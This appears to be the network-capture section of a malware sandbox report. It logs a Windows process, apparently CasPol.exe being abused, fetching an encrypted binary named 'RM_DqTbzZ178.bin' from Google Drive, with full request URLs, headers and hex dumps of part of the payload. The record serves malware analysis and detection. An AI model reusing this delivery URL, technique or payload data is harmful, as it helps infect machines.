                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Host: drive.google.com
                                            Cache-Control: no-cache
                                            2021-11-24 14:40:42 UTC0INHTTP/1.1 302 Moved Temporarily
                                            Content-Type: text/html; charset=UTF-8
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 24 Nov 2021 14:40:42 GMT
                                            Location: https://doc-08-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp3ceb3h105f6050578iidjo4j/1637764800000/06007705055686197661/*/150165GSkz9-m3FahfFvn26gkuLRySZPu?e=download
                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                            Content-Security-Policy: script-src 'nonce-C80xVaKUYwstS4MSCP/t1A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                            Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: SAMEORIGIN
                                            X-XSS-Protection: 1; mode=block
                                            Server: GSE
                                            Set-Cookie: NID=511=R4G7ItUDhDj900yUbGW6wJEAXAcup5TrGLN7EBBaSleHu40IgqJ2ReA0HAE25GWSG0kymI3dYKIJPicIpRaw5jJFXbZ1ntRu_P8LC_AZQdiK10qNJ9Djc3dN-ZB08flnfEusivIWsXijcnrMDuWJO4jH42Fdq1n8HLuvGi-fpP0; expires=Thu, 26-May-2022 14:40:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                            Accept-Ranges: none
                                            Vary: Accept-Encoding
                                            Connection: close
                                            Transfer-Encoding: chunked
                                            2021-11-24 14:40:42 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 38 2d 35 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 72 6e 62 70
                                            Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-08-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbp
                                            2021-11-24 14:40:42 UTC2INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.11.2049793172.217.16.129443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-11-24 14:40:42 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp3ceb3h105f6050578iidjo4j/1637764800000/06007705055686197661/*/150165GSkz9-m3FahfFvn26gkuLRySZPu?e=download HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Cache-Control: no-cache
                                            Host: doc-08-5k-docs.googleusercontent.com
                                            Connection: Keep-Alive
                                            2021-11-24 14:40:42 UTC2INHTTP/1.1 200 OK
                                            X-GUploader-UploadID: ADPycdvpauInbNmAxKYgPzETF1DWnx9N1kxSHPrLnWjBatxj0-LBqK3bprK14OSVFohYIImvezkxqkjo2cM9maY55mWLG5Jetw
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Credentials: false
                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                            Access-Control-Allow-Methods: GET,OPTIONS
                                            Content-Type: application/octet-stream
                                            Content-Disposition: attachment;filename="RM_DqTbzZ178.bin";filename*=UTF-8''RM_DqTbzZ178.bin
                                            Content-Length: 221760
                                            Date: Wed, 24 Nov 2021 14:40:42 GMT
                                            Expires: Wed, 24 Nov 2021 14:40:42 GMT
                                            Cache-Control: private, max-age=0
                                            X-Goog-Hash: crc32c=9SxukA==
                                            Server: UploadServer
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                            Connection: close
                                            2021-11-24 14:40:42 UTC6INData Raw: 3f 18 f3 66 93 98 67 4e c6 2e db f9 1a 5b 95 11 49 c9 21 e3 61 5d 45 e5 39 4a a4 2b c0 f0 20 dd cd 70 af b2 05 f1 8e 4f 7c e2 f3 af 17 26 1c 61 8c 11 9d e5 65 00 21 d5 85 51 f0 ba 77 a9 28 d6 8f 53 03 0e ad 74 7b 43 72 93 75 ab 8f b2 26 b1 4e 4d 73 d3 de 7f 24 8c d5 ff 76 1f 51 c8 0c 2e a3 d2 6c 77 fc 1c e6 86 cd a7 9d 1b 87 e6 46 df be f4 24 45 78 59 48 07 a4 38 5c 9b 66 c0 db 38 42 8b 2a 9a 34 de 1a 6c 8c 27 39 d0 65 b6 4a bb 2c f2 4c d5 0e cd 24 b7 81 22 fa 9f c3 91 7c 25 97 af b4 9a a2 b8 e9 58 5c 35 0b 81 8d 8d 6a 21 51 b2 f1 d6 11 e9 86 e4 12 d1 47 8b 15 12 7c c6 89 a8 43 68 16 86 c1 3d ee c7 8e 09 28 59 47 9c 5f a3 73 7a f0 30 41 b9 e6 dd 78 a2 64 39 07 e7 a7 4a e7 6b a8 f7 7c 6e a3 ec 84 9d 0b 2a 3a 97 fe d3 4a 5a e6 ee e2 cb 57 23 ac 90 f9 b5 ab
                                            Data Ascii: ?fgN.[I!a]E9J+ pO|&ae!Qw(St{Cru&NMs$vQ.lwF$ExYH8\f8B*4l'9eJ,L$"|%X\5j!QG|Ch=(YG_sz0Axd9Jk|n*:JZW#
                                            2021-11-24 14:40:42 UTC9INData Raw: b2 ba ce 1a f7 65 b5 f8 b2 9b 19 78 f1 bc eb 6d 71 eb 2b 68 3c dc dd 10 3c 1c a1 85 62 a2 17 12 f7 38 00 9e 7a f5 89 ca e6 87 78 d8 27 40 18 ba 3d 17 eb 7b d4 f4 14 81 75 f4 b4 ea c6 1a 76 0d ba 95 86 e0 bc b2 39 c4 95 2b 30 c8 c0 78 1f 13 d0 fa db d3 32 63 33 bc 09 7d 5d 9c 6b e1 8e aa 61 95 32 35 93 1a 04 a0 72 ea 45 e3 47 e7 9a b3 7a c5 57 3f 47 22 65 4c a1 dd 11 f9 f3 0b 2b 33 ba 7c 1f b1 6e d9 a2 c0 ec dd 05 fa 3d 50 5d 52 54 2b 6c 43 70 48 38 91 79 05 0b ba ce d8 a1 64 c6 a2 6c 85 d7 07 eb 80 50 fc 11 b1 a9 81 2a 03 7c 54 17 13 85 26 4b cd 1b 64 5e 5e d4 e7 4b 7d 5d b9 c3 73 df f5 31 2a 34 83 09 85 ab 61 e0 93 fa b5 50 3a c1 e2 22 5a c6 4f 1e 16 21 e9 d2 93 bb 38 bb 76 4c 5f 7c fd 01 c4 62 09 8c 27 fb 48 90 32 f2 ab 2c 43 fe 68 c7 8a 65 6a 8f 20 d7
                                            Data Ascii: exmq+h<<b8zx'@={uv9+0x2c3}]ka25rEGzW?G"eL+3|n=P]RT+lCpH8ydlP*|T&Kd^^K}]s1*4aP:"ZO!8vL_|b'H2,Chej
                                            2021-11-24 14:40:42 UTC13INData Raw: 39 c0 0a 54 1e d9 15 30 4c 6e 29 31 b0 ec 4a ab a7 57 41 9e 25 58 72 82 a5 dc 50 f4 f4 a4 45 3f 00 49 b6 f1 30 ac 7e 3d d8 9d 97 a8 40 5c 1e bf 41 58 f5 b4 fd 56 4f b4 89 e2 92 3d 1a 31 a3 90 02 5e cd f0 f8 26 30 0c f0 09 3c 0d b2 c4 f9 34 19 7b ca ac eb b0 ae 56 cd 12 f0 c8 62 d5 d5 f1 91 72 f3 3b aa e4 de de 2f 21 5d 17 69 54 78 ed 42 f8 22 11 f6 91 3c a6 52 7f 23 f0 82 9b a5 05 b6 62 46 69 45 a1 31 59 db b8 ff 98 3f 63 50 23 5c 61 37 77 16 0a ca a8 35 33 38 5d 7d 2a 5e ab fb 1f 0d ae b8 1a b6 84 74 b1 59 c6 ba 4b 5e 04 98 45 86 17 ea c7 5d 4c f0 4a d7 8e 6c cd 77 e2 5d 62 1a 2d 61 49 fe c6 36 f1 2a 0e c8 86 c6 a4 68 47 b7 6c 80 ca 94 2e 54 53 d4 5f 62 6b 67 31 87 19 84 d8 87 85 45 78 de 4e 1d 61 f8 c6 bb 5c ac c0 c7 ba 38 2c c5 c0 c0 67 a4 83 2b 2e 38
                                            Data Ascii: 9T0Ln)1JWA%XrPE?I0~=@\AXVO=1^&0<4{Vbr;/!]iTxB"<R#bFiE1Y?cP#\a7w538]}*^tYK^E]LJlw]b-aI6*hGl.TS_bkg1ExNa\8,g+.8
                                            2021-11-24 14:40:42 UTC17INData Raw: 6a 8b 78 44 ae a5 72 2d 23 db d6 b8 18 b1 09 c0 11 6c cd b9 f1 4e 52 19 ee c5 57 da 4a 3f 4d 55 89 4e bc 06 f0 9b 60 1e a9 cf ab a6 2d eb 9d 0e 41 50 18 20 45 12 6f 80 e1 1e f7 ba 91 a3 0f 4a f5 6d bd 1d a0 8e 93 35 15 46 4d ce 35 7f b6 9c 43 25 32 81 b7 78 6e d5 7d ef 1f 4e 36 11 f0 10 cb d1 7b 55 c4 15 c7 d9 e1 76 05 96 2d 63 0b 98 94 9a 9d 4d bf 08 ad 3a 96 68 b9 b2 89 9e 4b 70 37 e2 01 18 00 84 bc bb 9a dd 0c 9d c6 3c b1 12 2f b7 3a 21 fb 0f c8 12 e8 20 22 56 86 2b 7f 54 93 3f bb 15 d2 41 84 50 2d 8d 1c e9 ad 91 88 0e c7 ef ae 21 55 0c ae 72 53 89 76 93 7f 55 71 2d 0a de e7 4a 5b 14 dc 7f 22 9d 9c d7 44 1d 51 ce 24 09 a3 d2 66 18 31 1c e6 8c eb b6 9a 33 4f e4 46 d9 b8 dc 16 47 78 5f 60 20 a4 38 56 f4 2b c0 db 32 6a 85 97 bc fd 68 13 a7 bc 99 10 ae aa
                                            Data Ascii: jxDr-#lNRWJ?MUN`-AP EoJm5FM5C%2xn}N6{Uv-cM:hKp7</:! "V+T?AP-!UrSvUq-J["DQ$f13OFGx_` 8V+2jh
                                            2021-11-24 14:40:42 UTC18INData Raw: e2 bc 09 77 67 58 38 1e 63 6e 6f 87 72 d0 b5 10 04 b7 68 85 12 f6 47 ed 57 a0 55 e3 85 3f 4d 5c 39 85 a1 dc 11 e6 e5 2c 2a 33 b0 6d 5a b1 6e d7 b3 e4 be b9 c5 f8 37 50 55 58 1a 2b 6a 04 15 48 38 9d 6e 15 0b 26 ce d8 a1 4a fd 90 03 c0 c3 11 c9 b4 78 b0 15 97 72 d4 7b 03 7c 7b 39 0c c8 24 41 d8 49 21 4d 59 f6 d9 24 2f 57 64 ec 79 d8 81 75 24 34 82 62 ce eb fd ea bb b4 ac dd 29 d7 ca 0d 49 86 54 48 40 82 26 d0 93 ba f5 fe 36 5b 2b 67 fa 6e 98 4a 4c 84 90 ea b6 4a 1b f2 ad 42 36 fd 70 d5 5b 2d 2a 97 02 9c 08 45 1c 64 12 8e 54 6a 5b 4f ad e6 59 ed 99 5c 20 9f 36 5c 76 bb db c5 ae ff 7a be 0c 33 00 42 b6 f1 30 ac 75 6e f4 e6 86 ac 55 64 87 bc 6d 50 d4 83 f0 41 61 85 8e 8d 46 9f 05 2a 98 44 00 4f cf ce 28 25 1c 09 88 62 38 0d a9 e8 8e 2e e7 7c ce d2 c0 b5 9c 95
                                            Data Ascii: wgX8cnorhGWU?M\9,*3mZn7PUX+jH8n&Jxr{|{9$AI!MY$/Wdyu$4b)ITH@&6[+gnJLJB6p[-*EdTj[OY\ 6\vz3B0unUdmPAaF*DO(%b8.|
                                            2021-11-24 14:40:42 UTC19INData Raw: f8 93 b1 12 c9 00 69 eb d2 f3 4e 7d 38 2d c7 58 dc 50 b2 42 55 89 4e af 46 e1 db 4e 3f 6d cd a5 a0 25 c3 1f 05 41 56 3c 07 45 12 7f 22 f0 5f e0 92 55 a1 5d 45 e4 64 9b d9 a2 8e f5 14 32 46 42 c4 97 6e ec 84 6b e0 30 81 b1 7e 29 4a 7d ef 1b 66 f2 13 8d 1f e3 f6 74 55 ce b7 cc 99 f8 5f c1 94 2d 65 96 97 bc 0c 93 4d b5 20 f3 31 96 6e 9e 95 89 9e 5b d2 26 a3 29 d3 00 84 1f 9a f6 df 02 9b ee 1b 06 1b 25 d8 f9 21 fb 05 ea 84 e8 21 22 28 88 2b b9 59 ff 17 70 17 d2 47 78 93 2d 8d 19 17 ac ef 9c 0e c7 ea c2 09 93 0e 4d 7d 7b 43 78 93 75 ab 81 44 26 b1 f9 4d 73 d3 c4 7f 24 8d 95 ff 76 1f 51 c2 0c 2e ad d2 6c 77 f2 16 e6 86 c2 a7 9d 1b 9d e6 46 de be f4 24 45 65 53 48 07 aa 38 5c 9b cd ca db 38 43 94 90 94 2e 6a 13 a0 ad 9f 38 9c 92 9d 1e d3 4b 81 6c a5 34 a8 43 c5
                                            Data Ascii: iN}8-XPBUNFN?m%AV<E"_U]Ed2FBnk0~)J}ftU_-eM 1n[&)%!!"(+YpGx-M}{CxuD&Ms$vQ.lwF$EeSH8\8C.j8Kl4C
                                            2021-11-24 14:40:42 UTC20INData Raw: 34 c1 0d 19 52 5d d4 ca c9 39 63 34 a6 f7 7c 71 3a c4 8e 55 b0 61 9f 25 1d 67 04 0f b7 74 f1 bb f7 6b ef a3 9f 50 8c 51 15 51 5d 56 4b b7 22 1a d3 d9 56 20 33 b7 0d aa b0 42 d1 8f d2 bb ed fa 05 c8 50 57 72 1a 2b 7f 1c 3f 48 a1 9b 7f 12 43 f4 ce c9 bd 71 dd a8 83 ca d7 07 e1 97 7c a7 ed b0 83 ed 62 10 78 5e 00 3f d0 da 4a e7 7d 1d 6d 5e de eb 29 36 4e bd c9 69 dc 9d f5 2b 18 93 61 b9 c6 61 ea b1 b6 d8 a0 3c d7 c0 20 09 db 56 0c 56 bb ed c9 6d bd 7b e8 7f 44 cf 7b e6 7d 98 62 18 82 8a 12 9f 31 1c d9 90 36 5d f9 70 ce fd 25 94 8e 06 c1 1c 49 00 d5 07 ce 5c 46 3f b1 ac c0 4f b8 a1 00 4d 8d 36 4d 76 85 5f c4 82 f6 cf bc 48 29 39 20 aa 0f 37 22 66 05 d9 a5 fd 53 a0 b3 e8 a9 bb 5a f4 a2 7e f6 55 3a 9f c8 94 9f 05 3b 80 90 02 c8 cb e6 06 0f 1c 0f f6 32 e1 0f a3
                                            Data Ascii: 4R]9c4|q:Ua%gtkPQQ]VK"V 3BPWr+?HCq|bx^?J}m^)6Ni+aa< VVm{D{}b16]p%I\F?OM6Mv_H)9 7"fSZ~U:;2
                                            2021-11-24 14:40:42 UTC22INData Raw: 19 af b6 46 a6 bf a4 e6 0f c8 da d0 57 b3 09 c6 28 80 e7 d2 f5 21 2c 31 2d cd 5d c1 5c b2 50 4d 77 4e 83 54 c9 df 76 36 6b a2 56 a0 25 c9 36 f2 41 56 3a 0d 5c 1e 65 2a e7 a0 e1 be 57 b9 03 4c ec 79 6b d8 8e 9f 93 35 1c 44 4d c2 81 46 d8 84 6b eb 26 af fb 60 4a 43 75 f0 04 98 f3 3f fe 11 cb 8d 7b 55 c4 37 de 99 f8 5a de 86 21 65 12 84 42 0d b1 5e b3 08 8c 3a 96 68 b9 73 8b 9e 47 bd 5e a2 29 d9 0a 9f ba 93 fe c9 f2 9a c2 19 a6 1e 25 d0 e9 33 05 04 dc 86 c3 25 1a 5b 76 d4 80 7a ff 17 7e 0c e2 43 ac 51 2d 8d 16 3d ac ef 97 0c ef 14 c2 09 99 61 9a 74 7b 49 19 a6 75 ab 7a 47 fb 02 f6 4d 73 f6 f6 48 24 8c 9f f3 74 37 ae c8 0c 24 b0 d6 4c 77 f8 1c e6 0b b6 a7 9d 1a 8a 36 3a df be f5 0c 51 78 59 42 2f a4 39 5c 91 ef 4e 6c e0 f4 87 95 82 3f 7b 17 ce ac 9e 38 96 a1
                                            Data Ascii: FW(!,1-]\PMwNTv6kV%6AV:\e*WLyk5DMFk&`JCu?{U7Z!eB^:hsG^)%3%[vz~CQ-=at{IuzGMsH$t7$Lw6:QxYB/9\Nl?{8
                                            2021-11-24 14:40:42 UTC23INData Raw: a9 e8 be 79 33 b2 33 c4 84 2f 27 34 c1 0d 1c 49 58 fe d1 c2 36 7f cd bd 25 78 4a 1b db f2 98 b0 70 91 2b d0 a2 33 17 c9 51 ea 45 f2 6f 18 8b b1 58 e3 3a 3f 4d 5c 5c 55 b2 d8 1b ee df 5b d5 32 9c 16 7f ea 75 c0 a0 d7 92 95 1e 04 36 7a 66 74 75 2c 6d 2c 37 36 1d 9b 7f 16 6c 6e d8 f0 85 62 d9 9a 15 34 d6 2b d5 9a 6b b4 13 a0 ab f7 84 02 50 51 07 45 ed 24 4b cf fa 82 49 84 d3 ed 3e 3c 59 b9 d8 7c ce 7f 0a 06 37 95 75 d2 ab 70 ee a6 4a b6 7c 3e fc cf 34 36 39 ba f7 5e bd 3f de 9b b5 66 43 60 66 55 70 e1 5e 98 62 8a 81 90 ec b1 1d 19 e3 83 65 4e fd 76 5f d9 3c 6a 8b 54 e0 0a 45 1e ea 3d b0 6e 42 22 4b ba df 52 d1 ae 1e 5e 8d b8 eb 64 a2 8d ed e4 f5 d8 a9 61 2c f5 77 b3 f1 36 25 7a 50 ff 9d 86 a8 47 7f f6 c0 48 56 fc af 7e f6 71 a5 85 ca df 9f 05 26 9d 91 df 7c
                                            Data Ascii: y33/'4IX6%xJp+3QEoX:?M\\U[2u6zftu,m,76lnb4+kPQE$KI><Y|7upJ|>469^?fC`fUp^beNv_<jTE=nB"KR^da,w6%zPGHV~q&|
                                            2021-11-24 14:40:42 UTC24INData Raw: 74 b0 3b 26 dc e2 68 38 a4 89 aa 0e a3 ba 42 73 aa 59 e7 23 d9 c3 8f a0 a8 77 c8 00 69 e1 fa f8 4d 54 37 05 e3 57 dc 5a 32 50 55 89 4b 72 ad e3 db 76 34 72 b5 98 b9 5b cb 59 0c 45 7e 3c 04 45 14 4d 06 f0 5e ea 12 5d a1 0f 48 39 a9 97 d9 a2 8c 8a 64 01 5f 33 cc 97 6e f2 ac 66 e2 30 87 99 5a 46 43 77 6f 1d 66 f2 17 2d b9 e1 f6 7b 57 d1 cd e5 80 86 56 c1 94 29 4d 14 9d bc 0a b5 69 b5 20 63 b8 9e 6e 91 91 54 0f 43 d2 26 a0 36 a8 33 9d c8 9b f6 df 08 b3 e1 18 b1 14 0d fc f6 21 f1 85 f8 84 e8 24 ff 5b 8a 2b 7f 52 e0 37 4d 0e ac 4f ac 9a 29 a5 4c 15 ac e9 ae 2a c7 eb c8 89 9b 0e ae 70 a6 16 74 93 75 83 74 4d 26 b7 99 44 72 d3 d4 10 2f 8d 95 f5 5e 1b 51 c8 0a 41 aa d3 6c 7d 93 16 e7 86 c7 b1 63 1a d8 e4 59 cd 40 f5 32 bb 79 06 4a 27 00 38 5c 9b 18 c1 cd c6 4d cb
                                            Data Ascii: t;&h8BsY#wiMT7WZ2PUKrv4r[YE~<EM^]H9d_3nf0ZFCwof-{WV)Mi cnTC&63!$[+R7MO)L*ptutM&Dr/^QAl}cY@2yJ'8\M
                                            2021-11-24 14:40:42 UTC26INData Raw: ee 0d 93 66 ef b4 fa f5 05 6f f1 bb c0 8c e7 38 a8 e5 d7 9e 34 2a d9 db 21 0e 4a 54 f7 2f d2 1e 6d 31 ad 02 55 4c 30 c6 eb 8f ba 7e 9b 20 35 a3 0e 1f a8 43 14 44 da 56 f6 8d a6 88 9b 81 b2 66 56 56 4d b2 d9 04 ce c8 5a 2b 22 ab 0c 43 4f 6f ff ae c6 88 8b d3 e9 3c 49 65 61 01 2b 7d 37 22 65 c6 9a 53 19 75 ff df c0 7d 71 d2 8f 2d d9 cc 07 f0 9d 67 94 ed b0 83 fa 52 16 7d 5e 1b 39 d9 2f 5a cf 1b 23 5f 5e d4 ec 3b 0a 4e a2 c9 69 c3 9e 28 d4 35 ae 6c c7 a0 7b 3c a8 bf a8 74 2f cc ca 1d 41 d9 65 f6 57 86 fc fa 86 bd 57 e5 74 5d 5e 61 f4 01 8a 63 09 8c 83 e1 81 3c 0a e9 ab 3c 55 e2 7c 21 f8 10 60 9e 21 de dc 56 11 d9 0e dd 56 42 33 54 b2 c2 b4 ae a7 10 5c 98 3d 74 60 92 a1 cf bd f3 c7 80 5f 32 28 35 af ee 14 f0 65 02 d2 9f 97 a7 77 5e e1 be 67 45 f8 b4 d3 52 7c
                                            Data Ascii: fo84*!JT/m1UL0~ 5CDVfVVMZ+"COo<Iea+}7"eSu}q-gR}^9/Z#_^;Ni(5l{<t/AeWWt]^ac<<U|!`!VVB3T\=t`_2(5ew^gER|
                                            2021-11-24 14:40:42 UTC27INData Raw: 5a 56 5f 0c 64 ca 36 a8 53 b7 f9 4b 60 2f f0 57 e1 4c 38 a5 90 3a 04 b2 b5 57 be b5 4b f6 0b c8 dd f8 99 a0 06 d1 11 bf f6 dd f1 5f 5b 19 3f c6 57 d6 43 bc 49 5a 93 5e a1 90 37 c8 79 34 7c c2 83 b2 24 c3 53 00 50 59 2a d1 56 1d 67 33 ff 76 f2 93 55 ab 02 5d eb 7e 43 ca ad 8c 84 12 1a 54 4c c4 9d 7d fb 95 64 fb 21 8c 67 a8 55 4c 7f fe 1a 4e e0 12 f0 1c f0 f3 6a 5a d4 61 c5 96 e9 5b d6 4e 3a b3 97 b5 bc 0c 9c 5e b1 22 78 37 87 6a 87 84 8c b6 52 d3 26 a8 2a c2 0c eb aa 92 f6 d5 35 b7 ef 1b b1 1a 05 d6 76 21 fb 45 6f 84 e8 20 21 39 84 44 62 51 ff 1d 11 09 d3 47 a6 b2 7f 8d 16 11 bf fb 97 1a d6 fb ca 21 c3 0e ae 72 68 51 71 ff 56 ab 70 4d 26 b1 f6 6d 33 88 fd 7f 24 8c 95 ff 76 ef 6e 91 24 bf a3 d2 66 c0 eb ca 6b ad cd a7 9c 08 94 f7 54 ce ad f3 48 66 78 59 48
                                            Data Ascii: ZV_d6SK`/WL8:WK_[?WCIZ^7y4|$SPY*Vg3vU]~CTL}d!gULNjZa[N:^"x7jR&*5v!Eo !9DbQG!rhQqVpM&m3$vn$fkTHfxYH
                                            2021-11-24 14:40:42 UTC28INData Raw: 39 e8 26 46 18 81 01 3f fe 70 0a fe 10 c4 ed f4 b4 e1 fd 1f 5e 1a bb ec 8c e7 37 dd ab c4 95 21 23 cc d1 27 0b 79 ca f8 d1 d5 24 ee 34 bc 09 7c 49 25 d2 c9 3f b0 61 9f 2b a2 9c 1f 04 b6 5b d9 44 f6 4d f0 07 8e 52 8c 56 17 fd 56 56 46 89 86 1b ff d1 56 fd be 9b 13 54 b0 7d d4 b5 d1 97 b9 1c f9 37 50 65 ff 1d 2b 6c 2d 2e 43 29 90 69 03 63 56 df d3 bc 74 55 af 03 ca d6 a5 f0 8d 6b bc 02 bd bb fa 62 8e 53 5e 11 3a db 29 5a c6 62 22 c2 4f d3 f6 32 b3 4c b4 de 50 7f 81 0b 20 12 93 6b c0 3b 4d f5 aa b8 a1 ca 14 c6 ca 0c 50 16 57 08 56 b1 c1 c6 93 bc 5d c7 42 4d 55 7a 8e 7c 9c 62 12 95 97 fd 99 0c 1e 7c 1c 35 94 eb ec ac dc 3d 6a 85 39 cc 1b 4d 0e ee 19 cd 4d 44 35 c2 aa ec 4a ae 98 12 4f 85 20 4d 77 bb b0 c5 ae ff 7a be 40 3a 23 35 bf e5 22 19 e9 01 dc 9d 87 bf
                                            Data Ascii: 9&F?p^7!#'y$4|I%?a+[DMRVVVFVT}7Pe+l-.C)icVtUkbS^:)Zb"O2LP k;MPWV]BMUz|b|5=j9MMD5JO Mwz@:#5"
                                            2021-11-24 14:40:42 UTC29INData Raw: 48 4a 7c 31 87 53 6a 9d 85 85 30 76 44 4e 17 78 f2 fe 36 77 a6 e8 5d a9 1b 39 c2 47 67 38 a4 82 39 22 b2 bf 59 b6 b2 79 f1 3d f3 cf f9 93 bb 18 c5 16 78 c1 c4 ec 56 7c 22 2c c7 5d cd 72 a3 7c 3a ae 4e af 4c f0 f9 67 15 02 e5 aa a0 2f d2 7b 1b 2e 7f 31 07 4f 03 47 3b 9f 74 e1 92 5f b0 2d 23 cf 65 95 d3 b3 8a 83 0c 36 c8 fa ab bb 6f f6 8e 78 c4 2f c1 3c 55 46 43 7c fc 34 77 d7 0c d8 07 c2 e0 64 15 e6 a4 d7 99 f2 2d e4 95 2d 6f 09 b8 ad 2a 8c 6c da 02 68 38 9c 7d b6 84 ae b6 55 d3 26 a8 01 84 02 84 b0 bb d8 dd 0c 9d 81 63 b1 12 2f cb de 26 ea 03 e1 ac 87 1a 23 28 82 f5 73 41 d9 3b 79 06 f4 28 fb 9a 2d 87 ca 10 a6 31 9f 09 cd 35 d7 0e 99 d0 bf 51 53 74 76 93 7f b8 59 65 1e b1 f6 47 ad d3 d9 55 22 a6 d4 83 